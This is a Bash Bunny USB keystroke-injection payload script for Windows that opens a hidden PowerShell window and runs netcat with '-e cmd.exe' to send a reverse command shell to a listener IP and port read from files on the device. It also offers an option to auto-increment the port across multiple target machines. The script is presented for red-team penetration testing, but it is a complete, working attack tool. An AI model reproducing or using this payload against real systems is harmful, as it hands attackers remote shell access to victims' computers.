#!/bin/bash
#
# Title:         RAZ_ReverseShell
# Author:        RalphyZ
# Version:       1.0
# Target:        Windows 7+
# Dependencies:  The following files must exist in the switch folder:
#                nc.exe - Windows binary for netcat with the -e flag
#                listener_port.txt - The Port number for the netcat listener
#                listener_ip.txt - The IP Address for the netcat listener
# 
# Description:   Executes a netcat reverse cmd shell at a given IP and Port
#                Intentionally, this script leaves a trace in the Run Box
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# White (blinking)..........Incrementing the port in listener_port.txt
# Blue (blinking)...........listener_port.txt was not found
# Light-Blue (blinking).....listener_ip.txt was not found
# Amber (blinking)..........nc.exe was not found


# Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false

LED G
ATTACKMODE HID STORAGE

LANGUAGE='us'

# Get the switch position
source bunny_helpers.sh


# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
    LED B 100
    exit 1
else
  my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi

if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
    LED B G 100
    exit 1
else
    my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi

if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
    LED R G 100
    exit 1
fi 

# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
QUACK ENTER

# If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then   
   LED R G B 100
   echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
   
   # Allow the write to sync to the USB
   sleep 1
fi

# Signal everything went OK - white
LED R G B
exit 0
